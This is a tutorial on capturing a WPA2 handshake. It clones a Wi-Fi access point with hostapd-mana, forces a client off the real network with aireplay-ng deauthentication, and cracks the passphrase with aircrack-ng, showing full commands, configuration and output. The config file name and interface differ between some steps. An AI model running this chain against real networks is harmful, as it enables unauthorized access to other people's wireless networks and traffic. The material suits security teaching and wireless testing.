Acquisition of a WPA handshake with a cloned access point

Introducción

A handshake WPA (Wi-Fi Protected Access) is a process in which a client device authenticates with an access point that uses the security protocol WPA. During this process, the client device and the access point exchange information to establish a secure connection. This information includes cryptographic data used to encrypt communication between the client device and the access point, ensuring thus the privacy and security of the Wi-Fi connection. In computer security environments, capturing a handshake WPA can be used to perform brute-force attacks to decrypt the Wi-Fi network password.️

One of the methods to obtain that handshake is to create an access point with the same identifying data as the original access point and try to have the client connect to it, either disconnecting it from the original access point or being disconnected it will connect automatically.️

Data retrieval from access point

First, access point data must be obtained, in this case using the tool airodump-ng and the interface initialized in monitor mode.️

$ sudo ip link set wlan1 down; sudo iw dev wlan1 set type monitor; sudo ip link set wlan1 up
$ sudo airodump-ng wlan1
CH  1 ][ Elapsed: 18 s ]

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID

 BA:53:9C:05:87:29  -10  93      205        0    0   1   65   WPA2 CCMP   PSK  WIFINET

We found a Wi-Fi network, with ESSID WIFINET, channel 1, MAC address BA:53:9C:05:87:29 and encryption WPA2-CCMP with PSK (Pre-shared key). We found a connected client with MAC address 52:D6:59:D2:37:06.️

BSSID              STATION            PWR   Rate    Lost    Frames  Notes  Probes

 BA:53:9C:05:87:29  52:D6:59:D2:37:06  -43    1e- 1e    44      174         WIFINET

Cloned Access Point Configuration️

The hostapd-mana tool will be used, which will facilitate the creation of the access point and capture of the handshake file (without the need for another interface active in monitor mode). This tool is available by default in Kali Linux repositories, so it can be installed.️

$ sudo apt install hostapd-mana -y

The configuration file will be called hostapdmana.conf with the network interface wlan1. The file with the handshake will be saved in the path /tmp/handshake.hccapx.

$ vi hostapdmana.conf
# Wireless interface️
interface=wlan1
# Wireless Network Name of the cloned network
ssid=WIFINET
# Channel of the cloned network️
channel=1
# Use the 2.4 GHz band
hw_mode=g
# Activate IEEE 802.11n️
ieee80211n=1

# Enable WPA2
wpa=2
# Enable authentication with pre-shared key WPA-PSK
wpa_key_mgmt=WPA-PSK
# Enable CCMP encryption for WPA2
rsn_pairwise=CCMP
# WPA-PSK key (the value does not matter, when capturing the handshake)️
wpa_passphrase=password

# File where the handshake file will be saved
mana_wpaout=/tmp/handshake.hccapx

Activation of the access point

A connection to the access point will be established with hostapd-mana specifying the configuration file as a parameter.

$ sudo hostapd-mana hostapd-wpa2mana.conf
Configuration file: hostapd-wpa2mana.conf
MANA: Captured WPA/2 handshakes will be written to file '/tmp/handshake.hccapx'.
Using interface wlan1 with hwaddr c0:22:50:e6:1a:38 and ssid "WIFINET"
wlan1: interface state UNINITIALIZED->ENABLED
wlan1: AP-ENABLED

Deauthentication of the client from the original access point.️

After with the tool aireplay-ng, we will send deauthentication packets to the client connected to the original access point so that it connects to the cloned access point.️

$ sudo aireplay-ng -0 0 -a BA:53:9C:05:87:29 -c 52:D6:59:D2:37:06 wlan0
Sending 64 directed DeAuth (code 7). STMAC: [52:D6:59:D2:37:06] [28|65 ACKs]
Sending 64 directed DeAuth (code 7). STMAC: [52:D6:59:D2:37:06] [64|63 ACKs]
Sending 64 directed DeAuth (code 7). STMAC: [52:D6:59:D2:37:06] [64|58 ACKs]

It is confirmed that the client has received the deauthentication packages sent.️

Handshake retrieving and password recovery

After a few seconds of waiting, the capture of the client’s handshake and that the password is incorrect appears (it is normal since we do not know the access point’s password).️

$ sudo hostapd-mana hostapd-wpa2mana.conf
...
wlan1: STA 52:d6:59:d2:37:06 IEEE 802.11: associated
MANA: Captured a WPA/2 handshake from: 52:d6:59:d2:37:06
wlan1: AP-STA-POSSIBLE-PSK-MISMATCH 52:d6:59:d2:37:06

With the handshake file, we can recover the password of the original access point using the tool aircrack-ng and the dictionary john.lst. The MAC address of the access point must be specified with the parameter --bssid.️

$ aircrack-ng -w /usr/share/wordlists/john.lst --bssid BA:53:9C:05:87:29 /tmp/handshake.hccapx
                               Aircrack-ng 1.7 

      [00:00:00] 535/3559 keys tested (12783.27 k/s) 

      Time left: 0 seconds                                      15.03%

                           KEY FOUND! [ margaret ]


      Master Key     : A9 35 99 1F 49 34 73 10 61 B2 97 10 A7 61 12 D6 
                       8E B4 B0 2F 4C CB 00 A5 3F 8B F7 25 01 8C 63 24 

      Transient Key  : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
                       00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
                       00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
                       00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 

      EAPOL HMAC     : FC 97 CD A4 15 3B 32 60 A3 D8 36 48 CA 79 49 1F

The key to the access point is margaret.️

Conclusion️

With the access key obtained, we will be able to connect to the network with tools wpa_supplicant and dhclient. In the case that the password is sufficiently robust, we will not be able to recover it with the default dictionaries. We will have to create our own dictionaries or perform other types of attacks such as the “Evil Twin Attack” in which a cloned access point requests credentials from the client through a captive web portal.️